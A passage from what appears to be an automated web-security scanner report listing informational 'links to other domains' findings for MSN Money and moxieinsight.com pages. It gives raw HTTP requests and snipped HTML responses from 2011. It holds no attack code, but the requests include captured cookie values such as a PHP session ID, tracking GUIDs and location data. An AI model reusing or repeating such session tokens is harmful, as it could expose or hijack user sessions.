...[SNIP]...
y', 'True','0');" href="http://money.msn.com/market-news/post.aspx?post=52202fc5-4a2e-46b1-903d-a418351bd8ea&amp;rrurt=0&amp;rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. StockScouter data provided by <a class="opennew" href="http://www.gradientanalytics.com/">Gradient Analytics</a>. IPO data provided by <a class="opennew" href="http://www.hoovers.com">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="https://secure.opinionlab.com/ccc01/o.asp?id=GeTjJUhA&amp;resize=false">Feedback</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2608-Leadership-Management-Most-employees-are-not-loyal?ocid=xnetr2-3">Study shows most employees are not loyal</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=ron+paul&amp;form=MSNXNM&amp;ocid=xnetr2-4">Bing: Ron Paul joins 2012 White House race</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=how+much+to+budget+for+home+maintenance&amp;form=MONEY3" class="opennew">Budgeting for home maintenance</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=how+to+live+cash-only&amp;form=MONEY3" class="opennew">Could you live on cash alone?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=jobs+and+hiring+fields+2011&amp;form=MONEY3" class="opennew">Career fields that are hiring now</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=I+want+to+retire+at+50+how+much+money+do+I+need&amp;form=money3" class="opennew">How much do I need to retire at 50?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=What+is+the+secret+to+saving+money&amp;form=money3" class="opennew">What's the secret of saving money?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=best+values+in+public+colleges+2011&amp;form=MONEY3" class="opennew">Best values in public colleges</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</div><script type="text/javascript" src="http://cpc.db3.s-msn.com/MSN/sc/js/38/8981e0642fa0b6ec71065801251bac.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

19.69. http://money.msn.com/market-news/post.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.msn.com
Path:   /market-news/post.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /market-news/post.aspx?post=52202fc5-4a2e-46b1-903d-a418351bd8ea HTTP/1.1
Host: money.msn.com
Proxy-Connection: keep-alive
Referer: http://money.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:35:53 GMT
ntCoent-Length: 78319
Content-Length: 78319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-msn.com/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script><link rel="stylesheet" type="text/css" href="http://cpc.db3.s-msn.com/MSN/sc/css/6a/3f779e02d09e82eb1eda5cc0043c14.css" media="all" /><!--[if IE]>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomemsn.com">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1303842953&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.msn.com%2Fmarket-news%2Fpost.aspx%3Fpost%3D52202fc5-4a2e-46b1-903d-a418351bd8ea&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<div class="pst_bod" id="abody"><img src="http://media.social.s-msn.com/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0690-0000-0000-000000000000_20110426144636_18_1680_20100128040552_CharleyBlaine_120x131[1].jpg" alt="Charley Blaine" class="imagefloatleft userImage lead" /><b>
...[SNIP]...
<div class="embed-box"><object id="CustomPlayer1_IE" type="application/x-shockwave-flash" width="610" height="500" data="http://img.widgets.video.s-msn.com/fl/customplayer/current/customplayer.swf"><param name="movie" value="http://img.widgets.video.s-msn.com/fl/customplayer/current/customplayer.swf" />
...[SNIP]...
lBinary', 'True','1');" href="http://money.msn.com/market-news/post.aspx?post=52202fc5-4a2e-46b1-903d-a418351bd8ea&amp;rrurt=1&amp;rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
y', 'True','0');" href="http://money.msn.com/market-news/post.aspx?post=52202fc5-4a2e-46b1-903d-a418351bd8ea&amp;rrurt=0&amp;rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. StockScouter data provided by <a class="opennew" href="http://www.gradientanalytics.com/">Gradient Analytics</a>. IPO data provided by <a class="opennew" href="http://www.hoovers.com">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="https://secure.opinionlab.com/ccc01/o.asp?id=GeTjJUhA&amp;resize=false">Feedback</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2608-Leadership-Management-Most-employees-are-not-loyal?ocid=xnetr2-3">Study shows most employees are not loyal</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=ron+paul&amp;form=MSNXNM&amp;ocid=xnetr2-4">Bing: Ron Paul joins 2012 White House race</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=how+much+to+budget+for+home+maintenance&amp;form=MONEY3" class="opennew">Budgeting for home maintenance</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=how+to+live+cash-only&amp;form=MONEY3" class="opennew">Could you live on cash alone?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=jobs+and+hiring+fields+2011&amp;form=MONEY3" class="opennew">Career fields that are hiring now</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=I+want+to+retire+at+50+how+much+money+do+I+need&amp;form=money3" class="opennew">How much do I need to retire at 50?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=What+is+the+secret+to+saving+money&amp;form=money3" class="opennew">What's the secret of saving money?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=best+values+in+public+colleges+2011&amp;form=MONEY3" class="opennew">Best values in public colleges</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</div><script type="text/javascript" src="http://cpc.db3.s-msn.com/MSN/sc/js/38/8981e0642fa0b6ec71065801251bac.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

19.70. http://money.msn.com/tax-tips/post.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.msn.com
Path:   /tax-tips/post.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /tax-tips/post.aspx?post=8fa91862-f906-481d-8eae-2c7e1758d57c HTTP/1.1
Host: money.msn.com
Proxy-Connection: keep-alive
Referer: http://money.msn.com/taxes/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; s_cc=true; s_sq=%5B%5BB%5D%5D; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:45:16 GMT
ntCoent-Length: 76880
Content-Length: 76880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-msn.com/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script><link rel="stylesheet" type="text/css" href="http://cpc.db3.s-msn.com/MSN/sc/css/6a/3f779e02d09e82eb1eda5cc0043c14.css" media="all" /><!--[if IE]>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomemsn.com">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1303843516&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.msn.com%2Ftax-tips%2Fpost.aspx%3Fpost%3D8fa91862-f906-481d-8eae-2c7e1758d57c&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<p>You've found the perfect pair of shoes but aren't sure you can afford them. You're waiting for your&#160;<a href="http://dontmesswithtaxes.typepad.com/4%20ways%20to%20receive%20your%20refund" title="http://dontmesswithtaxes.typepad.com/4%20ways%20to%20receive%20your%20refund">tax refund</a>
...[SNIP]...
<p>No worries! Whip out your <a href="http://www.bing.com/search?q=smartphone&amp;go=&amp;form=MSMONY" title="http://www.bing.com/search?q=smartphone&amp;go=&amp;form=MSMONY">smartphone</a>
...[SNIP]...
<p>IRS Commissioner Douglas Shulman announced today that <a href="http://www.irs.gov/newsroom/article/0,,id=234882,00.html" title="http://www.irs.gov/newsroom/article/0,,id=234882,00.html">the agency has its own smartphone app</a>
...[SNIP]...
<p>The app works just like the popular online&#160;<a href="http://www.irs.gov/individuals/article/0,,id=96596,00.html?portlet=8" title="http://www.irs.gov/individuals/article/0,,id=96596,00.html?portlet=8">Where's My Refund?</a>
...[SNIP]...
<p>According to the tax commissioner, this is just the latest communications advance by the IRS, which already is on&#160;<a href="http://twitter.com/irsnews" title="http://twitter.com/irsnews">Twitter</a> and&#160;<a href="http://www.youtube.com/IRSVideos" title="http://www.youtube.com/IRSVideos">YouTube</a>. (Here's the&#160;<a href="http://www.youtube.com/watch?v=LlOL7-wrjVg" title="http://www.youtube.com/watch?v=LlOL7-wrjVg">IRS video on IRS2Go</a>
...[SNIP]...
<p>As I noted when I mentioned the burgeoning&#160;<a href="http://dontmesswithtaxes.typepad.com/dont_mess_with_taxes/2011/01/taxes-there-are-apps-for-that.html" title="http://dontmesswithtaxes.typepad.com/dont_mess_with_taxes/2011/01/taxes-there-are-apps-for-that.html">tax app</a>
...[SNIP]...
<b>More from&#160;<a href="http://dontmesswithtaxes.typepad.com/" title="http://dontmesswithtaxes.typepad.com/">Don't Mess with Taxes</a>
...[SNIP]...
<div><a href="http://dontmesswithtaxes.typepad.com/%3Cp%3E&amp;nbsp;%3C/p%3E%20%3Cp%3E%3Cstrong%3Euse%20this%20version%20updated%209/28/10%3C/strong%3E%3C/p%3E%20%3Cp%3E%3Cstrong%3EThe%20text%20below%20needs%20to%20be%20copied%20in%20HTML%20format%20and%20inserted%20as%20such%20in%20new%20blog%20post%20to%20retain%20colors,%20formatting%20etc.%20%3C/strong%3E%3C/p%3E%20%3Cp%3E%3Cspan%20style=%22color:%20#990000;&quot;&gt;&lt;strong&gt;Related posts: &lt;/strong&gt;&lt;/span&gt;&lt;/p&gt; &lt;ul&gt; &lt;li&gt;fdsfs&lt;/li&gt; &lt;li&gt;fdsfdsf&lt;/li&gt; &lt;li&gt;fsfsdf&lt;/li&gt; &lt;li&gt;fdfdsfs&lt;/li&gt; &lt;/ul&gt; &lt;p&gt;&lt;em&gt;Want to tell your friends about this blog post? Check out the buttons -- &lt;span style=&quot;color: #0080ff;&quot;&gt;&lt;strong&gt;Tweet Th" title="http://dontmesswithtaxes.typepad.com/%3Cp%3E&amp;nbsp;%3C/p%3E%20%3Cp%3E%3Cstrong%3Euse%20this%20version%20updated%209/28/10%3C/strong%3E%3C/p%3E%20%3Cp%3E%3Cstrong%3EThe%20text%20below%20needs%20to%20be%20copied%20in%20HTML%20format%20and%20inserted%20as%20such%20in%20new%20blog%20post%20to%20retain%20colors,%20formatting%20etc.%20%3C/strong%3E%3C/p%3E%20%3Cp%3E%3Cspan%20style=%22color:%20#990000;&quot;&gt;&lt;strong&gt;Related posts: &lt;/strong&gt;&lt;/span&gt;&lt;/p&gt; &lt;ul&gt; &lt;li&gt;fdsfs&lt;/li&gt; &lt;li&gt;fdsfdsf&lt;/li&gt; &lt;li&gt;fsfsdf&lt;/li&gt; &lt;li&gt;fdfdsfs&lt;/li&gt; &lt;/ul&gt; &lt;p&gt;&lt;em&gt;Want to tell your friends about this blog post? Check out the buttons -- &lt;span style=&quot;color: #0080ff;&quot;&gt;&lt;strong&gt;Tweet Th">Taxes? There are apps for that</a>
...[SNIP]...
<div><a href="http://dontmesswithtaxes.typepad.com/dont_mess_with_taxes/2011/01/free-file-is-open-for-2011-tax-business-.html" title="http://dontmesswithtaxes.typepad.com/dont_mess_with_taxes/2011/01/free-file-is-open-for-2011-tax-business-.html">Free File is open for 2011 tax business</a>
...[SNIP]...
<div><a href="http://dontmesswithtaxes.typepad.com/dont_mess_with_taxes/2009/10/the-irs-electronic-future.html" title="http://dontmesswithtaxes.typepad.com/dont_mess_with_taxes/2009/10/the-irs-electronic-future.html">The IRS' electronic future</a>
...[SNIP]...
ntrlBinary', 'True','1');" href="http://money.msn.com/tax-tips/post.aspx?post=8fa91862-f906-481d-8eae-2c7e1758d57c&amp;rrurt=1&amp;rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
nary', 'True','0');" href="http://money.msn.com/tax-tips/post.aspx?post=8fa91862-f906-481d-8eae-2c7e1758d57c&amp;rrurt=0&amp;rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XN1tz_JTRFPFvDRzAlK6mn-3NBGaIxKeV?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XYSuAtQTiIbmWY5x8LnTfOeqbSUlTrotI?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-0c30e2cd9bd70f68.profile.live.com/msn/posts?mkt=en-us&amp;domain=en-us">David Canez</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-0c30e2cd9bd70f68.profile.live.com/msn/posts?mkt=en-us&amp;domain=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XM-Wq_mE2YFDT4WAaEDXwH4ACVgNl3BBy?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucrptlnk" href="http://help.live.com/help.aspx?mkt=en-gb&amp;project=tou&amp;querytype=keyword&amp;query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<map id="footermap01" name="footermap01"><area href="http://ad.doubleclick.net/clk;235714847;59569101;q" alt="Easy online payroll" shape="rect" coords="102,18,273,45" /><area href="http://ad.doubleclick.net/clk;235714865;59569116;w" alt="Create a website" shape="rect" coords="274,18,417,45" /><area href="http://ad.doubleclick.net/clk;235714872;59569839;g" alt="Organize your business" shape="rect" coords="419,18,621,45" /><area href="http://ad.doubleclick.net/clk;235714805;59569082;s" alt="More from Intuit" shape="rect" coords="1,1,92,60" /></map>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. StockScouter data provided by <a class="opennew" href="http://www.gradientanalytics.com/">Gradient Analytics</a>. IPO data provided by <a class="opennew" href="http://www.hoovers.com">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="https://secure.opinionlab.com/ccc01/o.asp?id=GeTjJUhA&amp;resize=false">Feedback</a>
...[SNIP]...
<span style="margin-top: -1.7em;&#xA;padding-bottom:0;display:inline; float:right;"><a href="http://ad.doubleclick.net/clk;234657140;58509386;p"><img src="http://colstb.msn.com/i/2F/6FE49758AA26A52D701152F6DA60E7.jpg" width="25" height="25" alt="Turbo Tax" title="Turbo Tax" class="img1">
...[SNIP]...
<li class="first"><a href="http://blog.turbotax.intuit.com/tax-tips/5-smart-ways-to-blow-your-tax-refund/04252011-5957">5 Smart Ways to Blow Your Tax Refund</a>
...[SNIP]...
<li><a href="http://blog.turbotax.intuit.com/tax-tips/use-part-of-your-tax-refund-for-summer-day-trips-with-your-kids/04222011-6165">Use Part of Your Tax Refund for Summer Day Trips with Your Kids</a>
...[SNIP]...
<li><a href="http://blog.turbotax.intuit.com/tax-tips/tax-cheats-the-most-common-ways-people-cheat-on-their-taxes/04202011-6377">Tax Cheats: The Most Common Ways People Cheat On Their Taxes</a>
...[SNIP]...
<li class="last"><a href="http://blog.turbotax.intuit.com/tax-tips/more-last-minute-tax-filing-tips/04162011-6232">MORE Last-Minute Tax Filing Tips</a>
...[SNIP]...
</a><a href="https://secure.opinionlab.com/ccc01/o.asp?id=GeTjJUhA&amp;resize=false">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=how+to+prepare+for+tax+audit&amp;form=money3">How to I prepare for a tax audit?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=homeowner+tax+breaks&amp;form=money3">What are the tax breaks for a homeowner?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=when+itemizing+deductions+is+best&amp;form=money3">When should I itemize my deductions?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=tax+return+errors+responsibility&amp;go=&amp;form=money3">Who is responsible for errors on my tax return?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=free+tax+help&amp;form=money3">Who can I call for help with my taxes?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=mortgage+interest+deduction+or+standard+deduction&amp;form=money3">Should I deduct my mortgage interest?</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</div><script type="text/javascript" src="http://cpc.db3.s-msn.com/MSN/sc/js/38/8981e0642fa0b6ec71065801251bac.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

19.71. http://moxieinsight.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moxieinsight.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /?xd_receiver=1 HTTP/1.1
Host: moxieinsight.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=2c9e5bbe7f56d18fa0b9532bc94c9016&extern=0&channel=http%3A%2F%2Fmoxieinsight.com%2F%3Fxd_receiver%3D1&locale=en_US
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6b3edcdb4805ead0868b6a622ed5ae73; __utmz=156098471.1303851459.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=156098471.878146381.1303851459.1303851459.1303851459.1; __utmc=156098471; __utmb=156098471.2.10.1303851459

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:07:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Content-Length: 324
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>xd</title></head>
<body>
<script src="http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js" type="text/javascript"></script>
...[SNIP]...

19.72. http://p.widgetserver.com/p/fetch/origin==http%3A%2F%2Ftwitter.com%2Fstatuses%2Fuser_timeline%2Faidswalkboston.atom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.widgetserver.com
Path:   /p/fetch/origin==http%3A%2F%2Ftwitter.com%2Fstatuses%2Fuser_timeline%2Faidswalkboston.atom

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

